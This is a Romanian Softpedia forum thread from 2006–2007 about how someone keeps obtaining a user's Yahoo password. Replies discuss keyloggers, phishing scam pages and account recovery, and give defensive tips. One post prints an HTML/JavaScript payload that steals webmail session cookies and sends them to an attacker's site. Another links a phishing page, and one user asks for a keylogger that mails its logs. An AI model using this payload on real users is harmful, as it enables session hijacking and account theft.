Jump to content

SUBIECTE NOI
« 1 / 5 »
RSS
Presbiopia - la 43 ani ?

Termen transcriere autovehicul

Cazare Timisoara pe 4-5 zile

Primele zile ale internetului per...
 Ditra 25

Casti USB-C ptr A-54

Aplicatie medicala / asistent med...

De ce vor atația politicieni...
 ERR_ADDRESS_UNREACHABLE

Legea 18/1968 Se mai aplica?

Digi conectare 2 routere prin fir

Succesiune notar versus instanta ...
 Montaj aer conditionat in balcon ...

Cont curent mulți valuta far...

Sugestii plan casa

Experiente cu firme care cumpara ...
 

Cum imi afla parola de E-mail ?

- - - - -
  • Please log in to reply
54 replies to this topic

#19
ioman87

ioman87

    Member

  • Grup: Members
  • Posts: 313
  • Înscris: 05.02.2006

View PostAndrei221, on Mar 15 2006, 18:46, said:

nu prea are cum sa ghiceasca datele cred..pt ca daca bagi campurile ..passul il trimite tot pe emailul tau..corectati-ma daca gresesc
:deadtongue:
m-am pishat pe mine de ras cand am citit. Ia si tu putin treaba logic: "Forgotten password" a fost pus pentru cei care si-au uitat parola si nu mai pot sa se logheze pe mail. Pai care-i rostu sa-ti trimita trimita un mail cu parola ta pe adresa ta de mail ca tu si-asa nu poti sa intri pe ea   :confuzzled:

#20
DustFeather

DustFeather

    Junior Member

  • Grup: Members
  • Posts: 192
  • Înscris: 14.02.2006
frate ce de minti in colturi ...am mai zis o data si eu si altii ... lui nu-i trebuie oricum sa afle metoda prin care se afla parola ... ii trebuiie doar sa stie ce programe ii trebuie ca sa se apere ... concluzie ... FRATE TU AI AUZIT VRE-O DATA DE FIREWALL ? care eventual sa stie sa monitorizeze fiecare port si sa stii sa-i configurezi si alertele si cu asta basta ... give us a brake ... astea-s motive pe care i le spui unui pushtan de 10 ani ! ca ala poate crede

#21
Intel

Intel

    Senior Member

  • Grup: Senior Members
  • Posts: 2,988
  • Înscris: 28.11.2001

View Postioman87, on Mar 15 2006, 19:25, said:

:deadtongue:
m-am pishat pe mine de ras cand am citit. Ia si tu putin treaba logic: "Forgotten password" a fost pus pentru cei care si-au uitat parola si nu mai pot sa se logheze pe mail. Pai care-i rostu sa-ti trimita trimita un mail cu parola ta pe adresa ta de mail ca tu si-asa nu poti sa intri pe ea   :confuzzled:
Nu mai face pe tine de ras ca vorbesti prostii :D
Parola e trimisa pe adresa de mail alternativa pe care te pune sa o bagi in momentul in care te inregistrezi.

shao, da, ai un keylogger.
Cum s-a mai zis, pe Softpedia gasesti o gramada de keyloggere. In plus, in momentul actual cam toate antivirusurile updatate la zi iti descopera daca ai sau nu un keylogger ;)

#22
GrLght

GrLght

    Active Member

  • Grup: Members
  • Posts: 1,211
  • Înscris: 13.11.2003

View PostIntel, on Mar 15 2006, 19:59, said:

Parola e trimisa pe adresa de mail alternativa pe care te pune sa o bagi in momentul in care te inregistrezi.
Email-ul alternativ este una din optiuni. Se poate si fara.  :D Tocmai mi-am spart singur contul de yahoo. Teoretic, oricine ma cunoaste cat de cat, imi poate fura parola   :w00t:

#23
stericuta

stericuta

    Member

  • Grup: Members
  • Posts: 757
  • Înscris: 16.03.2005

View PostGrLght, on Mar 16 2006, 07:35, said:

Email-ul alternativ este una din optiuni. Se poate si fara.  :D Tocmai mi-am spart singur contul de yahoo. Teoretic, oricine ma cunoaste cat de cat, imi poate fura parola   :w00t:

Probema e ca la recuperarea parolei prin intrebarea secreta, yahoo seteaza o parola aleatoare. Daca cineva reuseste sa raspunda la intrebarea secreta, tot nu poate afla parola initiala, yahoo schimband-o cu una aleatoare!

#24
FreeMan_FX

FreeMan_FX

    Active Member

  • Grup: Members
  • Posts: 1,387
  • Înscris: 11.09.2004

View Poststericuta, on Mar 16 2006, 09:05, said:

Probema e ca la recuperarea parolei prin intrebarea secreta, yahoo seteaza o parola aleatoare. Daca cineva reuseste sa raspunda la intrebarea secreta, tot nu poate afla parola initiala, yahoo schimband-o cu una aleatoare!

You're right  :peacefingers:

Si eu cred ca ai un keylogger .. si daca ai asa ceva ..ce sa mai faca cu parola ? :rolleyes:  primeste toata conversatia  :w00t:

#25
bogdanel20

bogdanel20

    New Member

  • Grup: Members
  • Posts: 13
  • Înscris: 20.07.2006

View Postshao, on Mar 15 2006, 07:16, said:

cineva imi tot afla parola de yahoo! cum naiba face asta!mai exact framiu :D el e in franta eu aici cum face?!am inteles k ar fi vb de un keylogger :confuzzled: cum dau de el k in C: nu e k am formatat partitia!hep me!




Ma frate ..uite cum sta treaba...Daca zici k fratele tau e in Franta atunci nu are cum sa iti afle parola printr-un programel de genul Familiy Key Logger...Ams i eu din alea si fac mistho de prietenii mei care se logheaza de la mine de pe pc...Mai este un programel Personal Inspector care e mai mistho decat Key Logger...si are niste optiuni care il fac invizibil din lista de programe sau din taskbar...Dar sa fim seriosi....NU ARE CUM SA ITI AFLE PAROLA printr-un program de genul ala...Eu ma gandesc ca vrei sa spargi niste adrese de e-mail si nu  prea stii cum...Ori iti stie datele personale...ori iti da vreun link pe care tu intri si iti scrii userul si parola iar el le primeste pe mail...Ca sa iti arat k vb serios uite link-ul asta http://www.blackmoon.lx.ro/ pe care daca intri tre sa iti pui id si parola exact k la mail...dar cine nu stie nu isi da seama k este o tzeapa...si intra k fraierii akolo crezand k este vreun site de la yahoo...In momentul cand iti pui id si parola pagina aia care s-a deshis iti da o eroare[ca si cum nu s-ar conecta]..dar de fapt in momentul ala tu tocmai ti-ai trimis id si parola la adresa de mail a celui care a configurat link-ul!! Asa k vezi bine pe ce linkuri intri .......Nu mai pune botul la toate prostiile!! See u[size=3][b]

#26
softcristi

softcristi

    Junior Member

  • Grup: Members
  • Posts: 42
  • Înscris: 27.10.2006
salut.. curand cineva mi-a gasit parola de yahoo, bineinteles ca nu am recuperat-o, si a vorbit(de pe id-ul meu) cu un prieten si i-a zis ca nu face decat sa incarce Skype, sa mai cumpere un telefon... ceva de genu si iti afla parola... adica primesti un email de la [email protected] in care scrie ca, contul tau a fost sters, pentru a-l reactiva, da click aici si intra in contul tau yahoo. toate astea is scrise in engleza.....

DECI, nu da-ti click-uri aiurea char daca sunt de la yahoo administrative....

Banuiesc ca nu stie nimeni cum sa gasesc parola acuma... :D

#27
queensoft

queensoft

    Trust no one

  • Grup: Banned
  • Posts: 16,079
  • Înscris: 26.11.2005
Ba da, exact prin aceeasi metoda lame folsita si de 'ackerul ala.
Plus ca nu stiu cum ai gasit topicul asta de acum un an.. sint altele si mai noi.
Nici un site/banca/companie/etc. nu va cere niciodata parola/codul PIN/codul de acces la nici un cont (site)/cont (banca)/card/etc. Deci, trust no one !!

#28
Courage

Courage

    Founder

  • Grup: Senior Members
  • Posts: 21,658
  • Înscris: 26.11.2001
1. Probabil isi stie raspunsurile pt forgor my password.
2. Poate are keylogger, caz in care.. ar fi recomandat sa faci o reistalare de sistem pana vine el din FR.
3. Seteaza la Yahoo Alternative E-maill Address.
Cand dai Forgot Pass, iti vine pe acea adresa de e-mail. (poate a setat deja fratelo aceasta optiune si primeste pass imediat)

#29
207

207

    Junior Member

  • Grup: Members
  • Posts: 81
  • Înscris: 01.02.2007
ramane valabila si varinata cu keylogger+progam de remote (dupa cum vedeti omu` nu prea are habar de astea) sau altele mai complicate.
sa scaneze bine hardul, sa salveze ce e mai important si sa formateze.

#30
born2lose

born2lose

    Senior Member

  • Grup: Senior Members
  • Posts: 7,780
  • Înscris: 06.09.2004

View Postsoftcristi, on Jul 4 2007, 18:18, said:

salut.. curand cineva mi-a gasit parola de yahoo, bineinteles ca nu am recuperat-o, si a vorbit(de pe id-ul meu) cu un prieten si i-a zis ca nu face decat sa incarce Skype, sa mai cumpere un telefon... ceva de genu si iti afla parola... adica primesti un email de la [email protected] in care scrie ca, contul tau a fost sters, pentru a-l reactiva, da click aici si intra in contul tau yahoo. toate astea is scrise in engleza.....

Banuiesc ca nu stie nimeni cum sa gasesc parola acuma...

:lol:   :roflmao:  :roflmaofast:  
...se plimba omul linistit pe yahoo, si deodata, ce-i vad ochii pe jos? o parola!! isi zice, wow, ce tare, am gasit o parola!! si pac, a bagat-o in buzunar si a plecat linistit in plimbarea lui pe yahoo. si acum, la putin timp dupa, vine s-o caute ce-l care-o pierduse. si-o cauta, si-o cauta....dar nimic. asa ca se inscrie pe softpedia si intreaba cum s-o gaseasca. eu propun s-o caute cu lanterna  ;)
din pacate, din restul postului n-am inteles mare lucru.

View Postsoftcristi, on Jul 4 2007, 18:18, said:

DECI, nu da-ti click-uri aiurea char daca sunt de la yahoo administrative....

cui sa dam click-uri? nu dam dom'ne nimanui, stai linistit!! si de la yahoo administrative cine sa fie? click-urile? sau aiurea?
:lol:   :roflmao:  :roflmaofast:

#31
the_money_maker

the_money_maker

    Junior Member

  • Grup: Members
  • Posts: 112
  • Înscris: 02.05.2007

View Postborn2lose, on Jul 4 2007, 22:20, said:

:lol:   :roflmao:  :roflmaofast:  
...se plimba omul linistit pe yahoo, si deodata, ce-i vad ochii pe jos? o parola!! isi zice, wow, ce tare, am gasit o parola!! si pac, a bagat-o in buzunar si a plecat linistit in plimbarea lui pe yahoo. si acum, la putin timp dupa, vine s-o caute ce-l care-o pierduse. si-o cauta, si-o cauta....dar nimic. asa ca se inscrie pe softpedia si intreaba cum s-o gaseasca. eu propun s-o caute cu lanterna  ;)

ce umor ai!!!  :lol:

#32
softcristi

softcristi

    Junior Member

  • Grup: Members
  • Posts: 42
  • Înscris: 27.10.2006
am gasit  :first: .......... se folosea de un banal scam page  :bandit:

#33
kraMMer

kraMMer

    Active Member

  • Grup: Members
  • Posts: 1,931
  • Înscris: 23.04.2005
care e acel program keylogger care o data instalat poate trimite si mail cu tot ce se intampla pe acel calculator?
m-ar interesa... cine stie poate imi da un pm.. multumesc!

#34
Secure-X

Secure-X

    Junior Member

  • Grup: Members
  • Posts: 36
  • Înscris: 09.08.2006
daca s-a trecut cu vederea peste furtul parolei folosindu-te de naivitatea celui in cauza si de explicatiile cu trojan horses, worms, radmin si alte nebunii... va aduc la cunostinta faptul ca desi inca pe val si cu o putere financiara foarte mare, baietii de la yahoo inca au probleme (bug-uri) in serviciul lor de webmail.

mai concret... se poate trimite un cod atasat intr-un "html message" prin care se poate deschide o noua sesiune de logare folosind cookie-urile victimei (care sunt valabile 24h)... asta in caz ca victima nu a dat log out.

><DIV id=b style="VISIBILITY: hidden">
<STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900); b.innerHTML='<iframe src=http://www.site-care-preia-cookie-urile/banner.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\'  frameborder=0 width=10 height=10></iframe>';" type=text/css>
</STYLE>
</DIV>
<p>
</HTML>

sfat util : nu parasiti pagina Inbox-ului folosind Alt+F4 sau "X"-ul din dreapta sus al paginii... caci cookie-urile raman active.

multumire relativ macabra : e bine ca prin aceasta "manevra" atacatorii nu pot sa afle parola sau sa o schimbe :D ...

#35
antinVidia

antinVidia

    - I'm deranged -

  • Grup: Senior Members
  • Posts: 6,302
  • Înscris: 14.02.2007
Eu ma inteleg de minune cu fretemio  :P . Ne cunoastem parolele unul altuia si nu avem nici o treaba.
Puneti-va nene parole "tapene" ca asta : ^#29%Lw)!m$ si rezolvati problema .
Completati , datele de pe yahoo "la misto" si scrieti la intrebarea ajutatoare : GIGI si gata nu mai le afla nimeni.
Poate chiar nici voi  :lol: .....
Apoi, setati browser-ul sa stearga toate cookie-urile la iesire si evitati sa lasati parolele si adresa de mail pe site-uri dubioase .

Edited by antinVidia, 05 July 2007 - 21:02.


#36
antinari

antinari

    Guru Member

  • Grup: Senior Members
  • Posts: 21,384
  • Înscris: 08.12.2006

View Post207, on Jul 4 2007, 22:16, said:

ramane valabila si varinata cu keylogger+progam de remote (dupa cum vedeti omu` nu prea are habar de astea) sau altele mai complicate.
sa scaneze bine hardul, sa salveze ce e mai important si sa formateze.
Poți să formatezi tot hardul, dacă ai pe cd un kit (unul banal, Winamp de ex) la care ți-a atașat un binevoitor un keylogger, telenovela continuă...
Un keylogger se poate atașa pe orice executabil, inclusiv pe setup.exe sau cum i-o zice executabilului din kitul antivirusului :D Și trece cu brio și de scanarea cu antiviruși, (testat personal cu kaspersky, norton și nod32...)
Deci atenție ce programe instalați...

Anunturi

Bun venit pe Forumul Softpedia!

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Forumul Softpedia foloseste "cookies" pentru a imbunatati experienta utilizatorilor Accept
Pentru detalii si optiuni legate de cookies si datele personale, consultati Politica de utilizare cookies si Politica de confidentialitate